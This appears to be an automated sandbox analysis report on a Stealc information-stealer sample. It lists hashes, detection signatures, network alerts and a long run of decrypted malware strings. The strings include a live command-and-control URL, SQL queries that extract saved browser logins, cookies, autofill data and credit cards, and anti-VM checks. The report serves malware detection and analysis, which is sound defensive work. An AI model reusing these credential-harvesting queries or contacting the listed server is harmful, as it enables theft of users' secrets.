Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
lxEu3xfjIb.exe

Overview

General Information

Sample name:lxEu3xfjIb.exe
renamed because original name is a hash value
Original sample name:bb99cde9173ee6e21b61963f6a4a60da.exe
Analysis ID:1546917
MD5:bb99cde9173ee6e21b61963f6a4a60da
SHA1:2bcff0eba69c4592e4d2959e8a2e35fc35416338
SHA256:c40ada473bd3a23569dd60807fa9754f2917c029e28746e7c1a32568d801dbfe
Tags:exeStealcuser-abuse_ch
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
AV process strings found (often used to terminate AV products)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • lxEu3xfjIb.exe (PID: 1436 cmdline: "C:\Users\user\Desktop\lxEu3xfjIb.exe" MD5: BB99CDE9173EE6E21B61963F6A4A60DA)
    • WerFault.exe (PID: 2124 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1436 -s 1052 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://95.215.207.176/d8ddb681db736e16.php", "Botnet": "LogsDiller"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2288542652.0000000002C99000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.2288500521.0000000002C23000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0xd98:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.2088127603.0000000004920000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.3.lxEu3xfjIb.exe.4920000.1.unpackJoeSecurity_StealcYara detected StealcJoe Security
              0.2.lxEu3xfjIb.exe.4840e67.2.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                0.2.lxEu3xfjIb.exe.4840e67.2.unpackJoeSecurity_StealcYara detected StealcJoe Security
                  0.2.lxEu3xfjIb.exe.400000.0.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                    0.2.lxEu3xfjIb.exe.400000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
                      Click to see the 1 entries

                      Sigma Signatures

                      No Sigma rule has matched

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-01T17:44:19.423355+010020229301A Network Trojan was detected20.109.210.53443192.168.2.549720TCP
                      2024-11-01T17:44:47.675345+010020229301A Network Trojan was detected20.109.210.53443192.168.2.559725TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-01T17:44:05.331408+010020442431Malware Command and Control Activity Detected192.168.2.54970495.215.207.17680TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus / Scanner detection for submitted sample
                      Source: lxEu3xfjIb.exeAvira: detected
                      Found malware configuration
                      Source: 00000000.00000003.2088127603.0000000004920000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://95.215.207.176/d8ddb681db736e16.php", "Botnet": "LogsDiller"}
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for sample
                      Source: lxEu3xfjIb.exeJoe Sandbox ML: detected
                      Sample uses string decryption to hide its real strings
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: INSERT_KEY_HERE
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: 22
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: 11
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: 20
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: 24
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: GetProcAddress
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: LoadLibraryA
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: lstrcatA
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: OpenEventA
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: CreateEventA
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: CloseHandle
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: Sleep
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: GetUserDefaultLangID
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: VirtualAllocExNuma
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: VirtualFree
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: GetSystemInfo
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: VirtualAlloc
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: HeapAlloc
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: GetComputerNameA
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: lstrcpyA
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: GetProcessHeap
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: GetCurrentProcess
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: lstrlenA
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: ExitProcess
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: GlobalMemoryStatusEx
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: GetSystemTime
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: SystemTimeToFileTime
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: advapi32.dll
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: gdi32.dll
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: user32.dll
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: crypt32.dll
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: ntdll.dll
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: GetUserNameA
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: CreateDCA
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: GetDeviceCaps
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: ReleaseDC
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: CryptStringToBinaryA
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: sscanf
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: VMwareVMware
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: HAL9TH
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: JohnDoe
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: DISPLAY
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: %hu/%hu/%hu
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: http://95.215.207.176
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: gjtwvm
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: /d8ddb681db736e16.php
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: /70d63ca8a5be6cc3/
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: LogsDiller
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: GetEnvironmentVariableA
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: GetFileAttributesA
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: GlobalLock
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: HeapFree
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: GetFileSize
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: GlobalSize
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: CreateToolhelp32Snapshot
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: IsWow64Process
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: Process32Next
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: GetLocalTime
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: FreeLibrary
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: GetTimeZoneInformation
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: GetSystemPowerStatus
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: GetVolumeInformationA
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: GetWindowsDirectoryA
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: Process32First
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: GetLocaleInfoA
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: GetUserDefaultLocaleName
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: GetModuleFileNameA
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: DeleteFileA
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: FindNextFileA
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: LocalFree
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: FindClose
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: SetEnvironmentVariableA
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: LocalAlloc
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: GetFileSizeEx
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: ReadFile
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: SetFilePointer
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: WriteFile
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: CreateFileA
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: FindFirstFileA
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: CopyFileA
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: VirtualProtect
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: GetLogicalProcessorInformationEx
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: GetLastError
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: lstrcpynA
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: MultiByteToWideChar
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: GlobalFree
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: WideCharToMultiByte
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: GlobalAlloc
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: OpenProcess
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: TerminateProcess
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: GetCurrentProcessId
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: gdiplus.dll
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: ole32.dll
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: bcrypt.dll
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: wininet.dll
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: shlwapi.dll
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: shell32.dll
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: psapi.dll
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: rstrtmgr.dll
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: CreateCompatibleBitmap
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: SelectObject
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: BitBlt
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: DeleteObject
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: CreateCompatibleDC
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: GdipGetImageEncodersSize
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: GdipGetImageEncoders
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: GdipCreateBitmapFromHBITMAP
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: GdiplusStartup
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: GdiplusShutdown
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: GdipSaveImageToStream
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: GdipDisposeImage
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: GdipFree
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: GetHGlobalFromStream
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: CreateStreamOnHGlobal
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: CoUninitialize
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: CoInitialize
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: CoCreateInstance
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: BCryptGenerateSymmetricKey
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: BCryptCloseAlgorithmProvider
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: BCryptDecrypt
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: BCryptSetProperty
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: BCryptDestroyKey
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: BCryptOpenAlgorithmProvider
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: GetWindowRect
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: GetDesktopWindow
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: GetDC
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: CloseWindow
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: wsprintfA
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: EnumDisplayDevicesA
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: GetKeyboardLayoutList
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: CharToOemW
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: wsprintfW
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: RegQueryValueExA
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: RegEnumKeyExA
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: RegOpenKeyExA
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: RegCloseKey
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: RegEnumValueA
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: CryptBinaryToStringA
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: CryptUnprotectData
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: SHGetFolderPathA
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: ShellExecuteExA
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: InternetOpenUrlA
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: InternetConnectA
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: InternetCloseHandle
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: InternetOpenA
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: HttpSendRequestA
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: HttpOpenRequestA
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: InternetReadFile
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: InternetCrackUrlA
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: StrCmpCA
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: StrStrA
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: StrCmpCW
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: PathMatchSpecA
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: GetModuleFileNameExA
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: RmStartSession
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: RmRegisterResources
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: RmGetList
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: RmEndSession
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: sqlite3_open
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: sqlite3_prepare_v2
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: sqlite3_step
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: sqlite3_column_text
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: sqlite3_finalize
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: sqlite3_close
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: sqlite3_column_bytes
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: sqlite3_column_blob
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: encrypted_key
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: PATH
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: C:\ProgramData\nss3.dll
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: NSS_Init
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: NSS_Shutdown
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: PK11_GetInternalKeySlot
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: PK11_FreeSlot
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: PK11_Authenticate
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: PK11SDR_Decrypt
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: C:\ProgramData\
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: SELECT origin_url, username_value, password_value FROM logins
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: browser:
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: profile:
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: url:
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: login:
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: password:
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: Opera
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: OperaGX
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: Network
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: cookies
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: .txt
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: TRUE
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: FALSE
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: autofill
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: SELECT name, value FROM autofill
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: history
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: SELECT url FROM urls LIMIT 1000
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: cc
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: name:
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: month:
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: year:
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: card:
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: Cookies
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: Login Data
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: Web Data
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: History
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: logins.json
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: formSubmitURL
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: usernameField
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: encryptedUsername
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: encryptedPassword
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: guid
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: SELECT fieldname, value FROM moz_formhistory
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: SELECT url FROM moz_places LIMIT 1000
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: cookies.sqlite
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: formhistory.sqlite
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: places.sqlite
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: plugins
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: Local Extension Settings
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: Sync Extension Settings
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: IndexedDB
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: Opera Stable
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: Opera GX Stable
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: CURRENT
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: chrome-extension_
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: _0.indexeddb.leveldb
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: Local State
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: profiles.ini
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: chrome
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: opera
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: firefox
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: wallets
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: %08lX%04lX%lu
                      Source: 0.3.lxEu3xfjIb.exe.4920000.1.raw.unpackString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
